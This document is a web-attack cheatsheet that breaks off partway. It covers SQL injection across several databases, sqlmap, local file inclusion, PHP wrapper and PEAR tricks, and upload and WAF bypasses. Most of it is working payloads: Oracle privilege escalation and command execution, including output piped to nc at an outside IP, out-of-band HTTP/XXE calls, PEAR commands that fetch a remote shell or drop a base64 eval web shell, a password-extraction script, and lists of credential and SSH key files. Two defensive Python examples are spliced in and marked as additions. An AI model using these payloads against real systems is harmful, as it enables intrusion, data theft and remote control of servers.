SELECT CASE WHEN (CONDITION_HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
- Error Based
CTXSYS.DRITHSX.SN
SELECT * FROM news WHERE id=1 and CTXSYS.DRITHSX.SN(user, (SELECT banner FROM v$version WHERE rownum=1))=1
utl_inaddr.get_host_name
and 1=utl_inaddr.get_host_name((SQL in HERE))
- in version >= 11g this needs a superuser or a user with certain network privileges
dbms_xdb_version.checkin
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
dbms_xdb_version.makeversioned
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
dbms_xdb_version.uncheckout
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
dbms_utility.sqlid_to_sqlhash
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
- Out of band
UTL_HTTP.request('http://kaibro.tw/'||(select user from dual))=1
SYS.DBMS_LDAP.INIT()
utl_inaddr.get_host_address()
HTTPURITYPE
SELECT HTTPURITYPE('http://30cm.club/index.php').GETCLOB() FROM DUAL;
extractvalue() XXE
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT xxxx)||'.oob.kaibro.tw/"> %remote;]>'),'/l') FROM dual
- patched in newer versions
- users
select username from all_users
- lists all users of the database
select name, password from sys.user$
select username,password,account_status from dba_users
- Java source
- Java source code can be created and stored as an Oracle object
CREATE JAVA SOURCE NAMED "xxxx" AS <Java Code>
- Code execution
- load lib
create or replace library lib_evil as '/home/oracle/evil.so';
create or replace function cmd(str varchar2) return varchar2 as language c library lib_evil name "cmd";
select cmd('whoami') from dual;
- dbms_java.runjava
dbms_java.runjava('com/sun/tools/script/shell/Main -e "var p = java.lang.Runtime.getRuntime().exec(''$cmd'');"')
- DBMS_JAVA_TEST.FUNCALL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/usr/bin/bash','-c','/bin/ls|/usr/bin/nc 1.2.3.4 1234') FROM DUAL;
- DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
- privilege escalation through PL/SQL injection
- affected versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2
-- escalate privileges
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual
-- create the java Command class
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual
-- grant java execute permission
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
-- create the function
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
-- grant execute on the function
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual
-- run a command
select sys.cmd('cmd.exe /c whoami') from dual
- dbms_xmlquery.newcontext
- executes multiple statements
- affected versions: oracle 10g, 11g etc.; fixed in newer versions
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD';
select LINXRUNCMD('whoami') from dual;
- Special usage
DBMS_XMLGEN.getXML('select user from dual')
SQLite
- Substring:
substr("abc",1,1) => 'a'
- Ascii function:
unicode('d') => 100
- length
length('ab') => 2
- Concatenation
||
'a' || 'b' => 'ab'
- Time Delay
randomblob(100000000)
- Whitespace characters
0A 0D 0C 09 20
- Case when
- SQLite has no if
- Case When ... Then ... can be used instead: case when (condition) then ... else ... end
- Comments
--
- list table names
SELECT name FROM sqlite_master WHERE type='table'
- list table structure (including columns)
SELECT sql FROM sqlite_master WHERE type='table'
- Others
sqlite_version()
- sqlite cannot use \' to escape a single quote
- []
- curious usage: CREATE TABLE a AS SELECT sql [ some shit... ]FROM sqlite_master;
- CREATE TABLE can also be followed by a SELECT with conditions
- zer0pts CTF 2020 - phpNantokaAdmin
- Boolean Based: SECCON 2017 qual SqlSRF
# encoding: UTF-8
# sqlite injection (POST method) (binary search)
# recovers the admin password of SECCON sqlsrf one character at a time
require 'net/http'
require 'uri'
$url = 'http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi'
$ans = ''
(1..100).each do |i|
  l = 48   # '0'
  r = 122  # 'z'
  while(l <= r)
    #puts "left: #{l}, right: #{r}"
    break if l == r
    mid = ((l + r) / 2)
    # boolean condition: is the code point of character i of the admin password > mid?
    $query = "kaibro'union select '62084a9fa8872a1b917ef4442c1a734e' where (select unicode(substr(password,#{i},1)) from users where username='admin') > #{mid} and '1'='1"
    res = Net::HTTP.post_form URI($url), {"user" => $query, "pass" => "kaibro", "login" => "Login"}
    if res.body.include? 'document.location'   # a redirect means the condition held
      l = mid + 1
    else
      r = mid
    end
  end
  $ans += l.chr
  puts $ans
end
PostgreSQL
- Substring
substr("abc", 1, 1) => 'a'
- Ascii function
ascii('x') => 120
- Char function
chr(65) => A
- Concatenation
||
'a' || 'b' => 'ab'
- Delay function
pg_sleep(5)
GENERATE_SERIES(1, 1000000)
repeat('a', 10000000)
- Whitespace characters
0A 0D 0C 09 20
- encode / decode
encode('123\\000\\001', 'base64') => MTIzAAE=
decode('MTIzAAE=', 'base64') => 123\000\001
- limit N, M is not supported
limit a offset b
skip the first b rows, return a rows
- Comments
--
/**/
- $$ instead of quotes
SELECT $$This is a string$$
- list database names
SELECT datname FROM pg_database
- list table names
SELECT tablename FROM pg_tables WHERE schemaname='dbname'
- list columns
SELECT column_name FROM information_schema.columns WHERE table_name='admin'
- Dump all
array_to_string(array(select userid||':'||password from users),',')
- enumerate privileges
SELECT * FROM pg_roles;
- enumerate user hashes
SELECT usename, passwd FROM pg_shadow
- RCE
- CVE-2019-9193
- version 9.3 introduced COPY TO/FROM PROGRAM
- enabled by default in versions 9.3 ~ 11.2
- lets a superuser, or any user in the pg_read_server_files group, execute arbitrary commands
- method
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
- versions before 8.2
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('id');
- UDF
- sqlmap udf: https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/postgresql
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/xxx/cmd.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
SELECT sys_eval('id');
- Others
- version()
- current_database()
- user
- current_user
SELECT usename FROM pg_user;
- getpgusername()
- current_schema
- current_query()
- inet_server_addr()
- inet_server_port()
- inet_client_addr()
- inet_client_port()
- type conversion
cast(count(*) as text)
md5('abc')
replace('abcdefabcdef', 'cd', 'XX') => abXXefabXXef
pg_read_file(filename, offset, length)
- read file
- only files under data_directory
pg_ls_dir(dirname)
- list directory contents
- only directories under data_directory
- PHP's pg_query() can execute multiple statements
- lo_import(), lo_get() to read files
select cast(lo_import('/var/lib/postgresql/data/secret') as text) => 18440
select cast(lo_get(18440) as text) => secret_here
MS Access
- no comments
- in some cases %00 or %16 achieves a similar effect
- no Stacked Queries
- no Limit
- TOP or LAST can be used instead
'UNION SELECT TOP 5 xxx FROM yyy%00
- no Sleep, Benchmark, ...
- supports Subquery
'AND (SELECT TOP 1 'xxx' FROM table)%00
- a subquery or Union select needs an explicit FROM
- String Concatenation
& (%26)
+ (%2B)
'UNION SELECT 'aa' %2b 'bb' FROM table%00
- Ascii Function
ASC()
'UNION SELECT ASC('A') FROM table%00
- Substring Function
Mid()
Mid('admin',1,1)
- IF THEN
IIF(condition, true, false)
'UNION SELECT IIF(1=1, 'a', 'b') FROM table%00
- Ref
ORM injection
- Hibernate
- UNION syntax is not supported
- single-quote escaping technique
- in MySQL a single quote is escaped as \'
- in HQL it is escaped by doubling it: ''
'abc\''or 1=(SELECT 1)--'
- in HQL this is a single string
- in MySQL it is a string plus an extra SQL statement
- Magic Function technique
- PostgreSQL has the built-in query_to_xml('Arbitary SQL')
- Oracle has dbms_xmlgen.getxml('SQL')
- Java Constants
- constants can be looked up on the classpath and used
- e.g. ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHAR is resolved to a single quote at the MySQL layer (but not at the HQL layer)
- Example: DEVCORE Wargame 2024 - Spring
a'*length('a')*org.apache.logging.log4j.util.Chars.QUOTE and '-- '='a
- HQL: equivalent to
a'*length('a')*org.apache.logging.log4j.util.Chars.QUOTE and '[shit]'='a
- MySQL: equivalent to
a'*length('a')*'[shit]'-- [shit]
- Common constants:
org.apache.batik.util.XMLConstants.XML_CHAR_APOS
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE
jodd.util.StringPool.SINGLE_QUOTE
ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHAR
cz.vutbr.web.csskit.OutputUtil.STRING_OPENING
com.sun.java.help.impl.DocPConst.QUOTE
org.eclipse.help.internal.webapp.utils.JSonHelper.QUOTE
org.apache.logging.log4j.util.Chars.QUOTE
- Reference
HQL injection example (pwn2win 2017)
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select table_name from information_schema.columns limit 1)))',true,false,'')),1)
- Output:
ERROR: could not stat file "flag": No such file or directory
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select column_name from information_schema.columns limit 1)))',true,false,'')),1)
- Output:
ERROR: could not stat file "secret": No such file or directory
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select secret from flag)))',true,false,'')),1)
- Output:
ERROR: could not stat file "CTF-BR{bl00dsuck3rs_HQL1njection_pwn2win}": No such file or directory
SQL Injection with MD5
$sql = "SELECT * FROM admin WHERE pass = '".md5($password, true)."'";
- ffifdyop
- md5: 276f722736c95d99e921722cf9ed621c
- as a raw string: 'or'6<trash>
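The following is an added example, not code from the cheatsheet, reproducing the raw-digest splice in Python against a constructed in-memory SQLite table (the `admin` table and its one row are made up for the demonstration) and showing why binding the digest as a parameter closes the hole. It also generalizes the `ffifdyop` observation into a check for any input whose raw MD5 opens with `'or'` followed by a non-zero digit.

```python
import hashlib
import sqlite3


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def raw_md5_query(password):
    """Mirrors the page's PHP: md5($password, true) yields 16 raw bytes that are
    spliced into the SQL string. latin-1 maps each byte to one character, so the
    bytes survive unchanged, like PHP's binary-safe strings."""
    raw = hashlib.md5(password.encode()).digest().decode("latin-1")
    return "SELECT * FROM admin WHERE pass = '" + raw + "'"


def is_raw_md5_injector(password):
    """True when the raw digest opens with 'or' followed by a non-zero digit, the
    shape that turns the spliced query into ... pass = '' or '6<trash>' (true)."""
    d = hashlib.md5(password.encode()).digest()
    return d[:4] == b"'or'" and d[4:5] in b"123456789"


def make_db():
    """Constructed in-memory stand-in for the page's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, pass BLOB)")
    conn.execute("INSERT INTO admin VALUES (1, ?)",
                 (hashlib.md5(b"correct horse").digest(),))
    return conn


def login_vulnerable(conn, password):
    """String concatenation, as in the PHP line above."""
    return conn.execute(raw_md5_query(password)).fetchall()


def login_safe(conn, password):
    """Bind the digest as a parameter: it is compared as data, never parsed as SQL."""
    digest = hashlib.md5(password.encode()).digest()
    return conn.execute("SELECT * FROM admin WHERE pass = ?", (digest,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(md5_hex("ffifdyop"), is_raw_md5_injector("ffifdyop"))
    print(repr(raw_md5_query("ffifdyop")[:46]))
    print("vulnerable:", login_vulnerable(conn, "ffifdyop"))
    print("safe:", login_safe(conn, "ffifdyop"))
```

Note that the concatenated form is fragile even for honest input: any digest containing byte 0x27 breaks the statement outright (md5 of "password" does), which is itself a sign in error logs that raw digests are being spliced into SQL.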
HTTP Parameter Pollution
id=1&id=2&id=3
- ASP.NET + IIS: id=1,2,3
- ASP + IIS: id=1,2,3
- PHP + Apache: id=3
SQLmap
- https://github.com/sqlmapproject/sqlmap/wiki/Usage
- Usage
python sqlmap.py -u 'test.kaibro.tw/a.php?id=1'
- database names:
--dbs
- table names:
-D dbname --tables
- column:
-D dbname -T tbname --columns
- dump:
-D dbname -T tbname --dump
--start=1
--stop=5566
- DBA?
--is-dba
- dump credentials:
--passwords
- privileges:
--privileges
- get a shell:
--os-shell
- interactive SQL:
--sql-shell
- read file:
--file-read=/etc/passwd
- delay time:
--time-sec=10
- User-Agent:
--random-agent
- Thread:
--threads=10
- Level:
--level=3
- default: 1
--technique
- default: BEUSTQ
- Cookie:
--cookie="abc=55667788"
- Tor:
--tor --check-tor --tor-type=SOCKS5 --tor-port=9050
LFI
Testing Payload
Linux / Unix
- Common Payload
./index.php
././index.php
.//index.php
../../../../../../etc/passwd
../../../../../../etc/passwd%00
- only works on PHP below 5.3.0
- magic_quotes_gpc must be OFF
....//....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e/%252e/etc/passwd
NN/NN/NN/etc/passwd
.+./.+./.+./.+./.+./.+./.+./.+./.+./.+./etc/passwd
static\..\..\..\..\..\..\..\..\etc\passwd
- Config
/usr/local/apache2/conf/httpd.conf
/usr/local/etc/apache2/httpd.conf
/usr/local/nginx/conf/nginx.conf
/etc/apache2/sites-available/000-default.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/nginx/conf.d/default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/nginx/sites-enabled/default.conf
/etc/mysql/my.cnf
/etc/resolv.conf
/etc/named.conf
/etc/rsyslog.conf
/etc/samba/smb.conf
/etc/openldap/slapd.conf
/etc/mongod.conf
/etc/krb5.conf
~/.tmux.conf
~/.mongorc.js
$TOMCAT_HOME/conf/tomcat-users.xml
$TOMCAT_HOME/conf/server.xml
- Log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/mail.log
/var/log/auth.log
/var/log/messages
/var/log/secure
/var/log/sshd.log
/var/log/mysqld.log
/var/log/mongodb/mongod.log
.pm2/pm2.log
$TOMCAT_HOME/logs/catalina.out
- History
.history
.bash_history
.sh_history
.zsh_history
.viminfo
.php_history
.mysql_history
.dbshell
.histfile
.node_repl_history
.python_history
.scapy_history
.sqlite_history
.psql_history
.rediscli_history
.coffee_history
.lesshst
.wget-hsts
.config/fish/fish_history
.local/share/fish/fish_history
.ipython/profile_default/history.sqlite
- Other
/proc/self/cmdline
/proc/self/fd/[0-9]*
/proc/self/environ
/proc/net/fib_trie
/proc/mounts
/proc/net/arp
/proc/net/tcp
/proc/sched_debug
.htaccess
~/.bashrc
~/.bash_profile
~/.bash_logout
~/.zshrc
~/.aws/config
~/.aws/credentials
~/.boto
~/.s3cfg
~/.gitconfig
~/.config/git/config
~/.git-credentials
~/.env
/etc/passwd
/etc/shadow
/etc/hosts
/etc/rc.d/rc.local
/etc/boto.cfg
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/root/.ssh/config
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/exports
/etc/crontab
/var/spool/cron/root
/var/spool/cron/crontabs/root
/var/mail/<username>
Windows
C:/Windows/win.ini
C:/boot.ini
C:/apache/logs/access.log
../../../../../../../../../boot.ini/.......................
C:\Windows\System32\drivers\etc\hosts
C:\WINDOWS\System32\Config\SAM
C:/WINDOWS/repair/sam
C:/WINDOWS/repair/system
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\RegBack\system
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\iis[version].log
%WINDIR%\debug\NetSetup.log
%SYSTEMDRIVE%\autoexec.bat
C:\Documents and Settings\All Users\Application Data\Git\config
C:\ProgramData\Git\config
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\inetpub\temp\appPools\DefaultAppPool\DefaultAppPool.config
C:\Windows\System32\inetsrv\config\ApplicationHost.config
C:\WINDOWS\debug\NetSetup.log
C:\WINDOWS\pfro.log
C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
Environment variables
../../../../proc/self/environ
- put a php script into HTTP_User_Agent
php://filter
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-decode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/resource=index.php
php://filter/zlib.inflate/resource=index.php
php://filter/convert.quoted-printable-encode/resource=index.php
php://filter/read=string.strip_tags/resource=php://input
php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=index.php
php://filter/convert.iconv.UCS-4LE.UCS-4BE/resource=index.php
- ...
- Advanced tricks
- LFI RCE without controlling any file: https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
- Memory Limit Oracle to read local file: https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py
- Example:
php://input
?page=php://input
- post data:
<?php system("net user"); ?>
- Requires allow_url_include to be enabled; removed outright in 5.4.0
phpinfo
- Uploading a file to the server as form-data creates a tmp file
- Use phpinfo to obtain the tmp file's path and name
- LFI Get shell
- Limitation
- Since Ubuntu 17, PrivateTmp is enabled by default, so this cannot be used
php session
- Sessions are normally stored as sess_{PHPSESSID}
- Modifying the Cookie together with LFI can give a shell
- Common storage paths:
- /var/tmp/
- /tmp/
- /var/lib/php5/
- /var/lib/php/
- windows: C:\windows\temp\sess_
session.upload_progress
- Enabled by default in PHP
- Used to monitor file upload progress
- When session.upload_progress.enabled is on, a POST can add data to $_SESSION (sess_{PHPSESSID})
- Combined with LFI this can get a shell
- When session.upload_progress.cleanup=on, use a Race condition
- Upload zip
- The file starts with upload_progress_ and has extra data at the end, so an uploaded zip normally cannot be parsed
- Because the zip format is loose, deleting the first 16 bytes, or manually fixing the EOCD and CDH offsets before uploading, lets php parse the zip normally
- Example
PEAR
- Conditions
- pear is installed (pearcmd.php)
- register_argc_argv is enabled
- Write file
- Method 1:
/?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php
- Method 2:
/?+-c+/tmp/shell.php+-d+man_dir=<?phpinfo();?>/*+-s+list&file=/usr/local/lib/php/pearcmd.php
- Method 3:
/?+download+https://kaibro.tw/shell.php+&file=/usr/local/lib/php/pearcmd.php
- Method 4:
/?+channel-discover+kaibro.tw/302.php?&file=/usr/local/lib/php/pearcmd.php
- 302.php redirects to test.php, which is then downloaded
- Install package
/?+install+--force+--installroot+/tmp/wtf+http://kaibro.tw/KaibroShell.tgz+?&file=/usr/local/lib/php/pearcmd.php
- Command Injection
/?+install+-R+&file=/usr/local/lib/php/pearcmd.php&+-R+/tmp/other+channel://pear.php.net/Archive_Tar-1.4.14
/?+bundle+-d+/tmp/;echo${IFS}PD9waHAgZXZhbCgkX1BPU1RbMF0pOyA/Pg==%7Cbase64${IFS}-d>/tmp/hello-0daysober.php;/+/tmp/other/tmp/pear/download/Archive_Tar-1.4.14.tgz+&file=/usr/local/lib/php/pearcmd.php&
/?+svntag+/tmp/;echo${IFS}PD9waHAgZXZhbCgkX1BPU1RbMF0pOyA/Pg==%7Cbase64${IFS}-d>/tmp/hello-0daysober.php;/Archive_Tar+&file=/usr/local/lib/php/pearcmd.php&
- Command Injection 2
- No file write needed; requires a phpt file
/?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
- Example
Nginx buffering
- When the request body or the fastcgi server response is too large and exceeds the buffer size, its content is saved to a temporary file (reference)
- Temporary files are created under /var/lib/nginx/body/ and /var/lib/nginx/fastcgi/, but are deleted immediately
- The deleted file's content can still be obtained through /proc/<nginx worker pid>/fd/<fd>
- php's include() resolves the fd path into the form /var/lib/nginx/body/0000001337 (deleted), so the include fails; this can be bypassed as follows
/proc/self/fd/34/../../../34/fd/15
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/34/fd/15
- Example
data://
- Conditions
- allow_url_fopen: On
- allow_url_include: On
- Usage
?file=data://text/plain,<?php phpinfo()?>
?file=data:text/plain,<?php phpinfo()?>
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
zip / phar
- Applies when the extension is validated
- zip
- Create a zip containing a php script (the extension can be changed)
?file=zip://myzip.zip#php.jpg
- Example
- phar
<?php
$p = new PharData(dirname(__FILE__).'/phartest.zip', 0, 'phartest2', Phar::ZIP);
$x = file_get_contents('./a.php');
$p->addFromString('b.jpg', $x);
?>
- Construct
?file=phar://phartest.zip/b.jpg
SSI (Server Side Includes)
- Usually placed in .shtml, .shtm, .stm
- Execute Command
<!--#exec cmd="command"-->
- File Include
<!--#include file="../../web.config"-->
- Example
Upload vulnerabilities
JavaScript check
- Modify the request in Burp Suite
- disable javascript
Bypass MIME Detection
- Modify Content-Type in Burp
Blacklist extension check
- Case bypass
- pHP
- AsP
- Space / dot / Null bypass
- Windows behaviour
- .php(space) // modify in burp
- .asp.
- .php%00.jpg
- php3457
- .php3
- .php4
- .php5
- .php7
- .pht
- .phtml
- asp
- asa
- cer
- cdx
- aspx
- ascx
- ashx
- asmx
- asac
- soap
- svc
- master
- web.config
- jsp
- jspa
- jspf
- jspx
- jsw
- jsv
- jhtml
- .htaccess
- set handler
<FilesMatch "kai"> SetHandler application/x-httpd-php </FilesMatch>
- read file
ErrorDocument 404 %{file:/etc/passwd}
redirect permanent "/%{BASE64:%{FILE:/etc/passwd}}"
- Example: Real World CTF 4th - RWDN
- .user.ini
- Applies to any php run through fastcgi (nginx/apache/iis)
- A user-defined configuration file
- Can set PHP_INI_PERDIR and PHP_INI_USER settings
- Loaded dynamically, no restart needed
- Prerequisite: the directory must contain a php file
auto_prepend_file=test.jpg
File parsing vulnerabilities
- NTFS ADS
test.php:a.jpg
- generates test.php (empty content)
test.php::$DATA
- generates test.php (content unchanged)
test.php::$INDEX_ALLOCATION
- generates a folder named test.php
test.php::$DATA.jpg
- generates 0.jpg (content unchanged)
test.php::$DATA\aaa.jpg
- generates aaa.jpg (content unchanged)
Magic Number
- jpg
FF D8 FF E0 00 10 4A 46 49 46
- gif
47 49 46 38 39 61
- png
89 50 4E 47
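Added defender-side example (not from the cheatsheet): an upload validator that combines the extension, NTFS ADS, null-byte and magic-number checks listed in this section; the class and function names are chosen for this example.

```python
import re

# Constructed defender-side example (not the cheatsheet's code): reject the
# filename tricks listed above and require a magic number that matches the
# extension. Class and function names are chosen for this example.

# Extension allowlist, each mapped to the magic numbers accepted for it.
ALLOWED_MAGIC = {
    "jpg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}
_SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class UploadRejected(ValueError):
    """Raised when a filename or its content fails validation."""


def sanitize_filename(name: str) -> str:
    """Reduce a client-supplied filename to <base>.<ext> or raise UploadRejected.

    Blacklist filters miss: NUL bytes (shell.php\\x00.jpg), NTFS streams
    (test.php::$DATA), trailing dots/spaces that Windows strips (shell.php.),
    directory parts, and stacked extensions (a.php.jpg). Each is rejected or
    normalized here.
    """
    if "\x00" in name or ":" in name:
        raise UploadRejected("NUL byte or NTFS stream syntax in filename")
    name = name.replace("\\", "/").rsplit("/", 1)[-1]  # keep only the last path element
    name = name.rstrip(". ")                           # Windows would drop these anyway
    parts = name.split(".")
    if len(parts) != 2:
        raise UploadRejected("exactly one extension is required")
    base, ext = parts[0], parts[1].lower()             # pHP / AsP collapse to lowercase
    if ext not in ALLOWED_MAGIC or not _SAFE_BASE.match(base):
        raise UploadRejected("extension or base name not allowed")
    return "%s.%s" % (base, ext)


def magic_matches(ext: str, data: bytes) -> bool:
    """True if the content starts with a magic number valid for ext."""
    return any(data.startswith(magic) for magic in ALLOWED_MAGIC[ext])


def validate_upload(name: str, data: bytes) -> str:
    """Return the name to store the file under, or raise UploadRejected."""
    safe = sanitize_filename(name)
    ext = safe.rsplit(".", 1)[1]
    if not magic_matches(ext, data):
        raise UploadRejected("content does not start with a %s magic number" % ext)
    # A valid magic number does not make the content harmless: a polyglot such
    # as GIF89a<?php ... ?> passes this check, so the upload directory must be
    # served without script execution as well.
    return safe
```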
Bypass WAF
Content-Disposition / filename / Form header
- Java (commons-fileupload)
- filename can be padded before and after with %20, %09, %0a, %0b, %0c, %0d, %1c, %1d, %1e, %1f
- e.g.
Content-Disposition: form-data; name="file"; %1cfilename%0a="shell.jsp"
- Quoted-Printable (QP) / Base64 encoding
Content-Disposition: form-data; name="file"; filename="=?UTF-8?B?c2hlbGwuanNw?="
Content-Disposition: form-data; name="file"; filename="=?UTF-8?Q?=73=68=65=6c=6c=2e=6a=73=70?="
- Spring filename encoding behaviour
Content-Disposition: form-data; name="file"; filename*="1.jsp"
Content-Disposition: form-data; name="file"; filename*="UTF-8'1.jpg'1.jsp"
Content-Disposition: form-data; name="file"; filename*="UTF-8'1.jpg'=?UTF-8?Q?=E6=B5=8B=E8=AF=95=2Ejsp?="
- .NET (context.Request.files)
- The upload filename is extracted by matching only the filename=xxx after Content-Disposition:
Content-Disposition:name="file"kaibrokaibrofilename=shell.aspx
- Inconsistent parsing
filename=a.php; filename*=UTF-8''a
- php: a.php
- golang: a
- Example: Codegate 2024 - Cha's Wall
- Form header confusion
x=filename="1;/../shell.aspx";
- WAF's view: x=filename="1;
- Backend's view: filename="1;/../shell.aspx"
- Content-Type confusion
Content-Type: application/x-www-form-urlencoded; multipart/form-data; boundary=x
--x
Content-Disposition: form-data; name="query";
Content-Type: image/jpeg&action=search&query=aaa'or''='
meow
--x--
Boundary
Null Byte:
Content-Type: multipart/form-data; boundary=x
--x\0
Content-Disposition: form-data; name="path";
../../../../etc/passwd
--x\0
--
Double Boundary (frontend and backend parse inconsistently):
Content-Type: multipart/form-data; BOUNDARY=y; boundary=x;
--x
Content-Disposition: form-data; name="test";
Content-Type: text/plain
--y
Content-Disposition: form-data; name="msg";
Content-Type: text/plain
1
--y--
--x--
(backend takes y, WAF takes x)
--
Combo (Double Boundary + Form header confusion + Content-type mutation):
Content-Type: multipart/form-data; BOUNDARY=y:; boundary=x;
--x
Content-Disposition: form-data; name="x";
1
--x
--y:
Content-Disposition: form-data; name="file"; x=filename="1;/../shell.aspx";
--x
Content-Disposition: form-data; name="foo";
Content-Type: <%@ Page Language="JScript"%><%eval(Request.Item["x"],"unsafe");%>
--y:--
--x--
Other
- Common scenario: combine with a file parsing vulnerability
- Overlong filename truncation
Deserialization
PHP - Serialize() / Unserialize()
- __construct(): called when an object is created with new, but not by unserialize()
- __destruct(): called when the object is destroyed
- __wakeup(): called automatically during unserialize
- __sleep(): called during serialize
- __toString(): called when the object is used as a string
- Value
- String: s:size:value;
- Integer: i:value;
- Boolean: b:value; ('1' or '0')
- NULL: N;
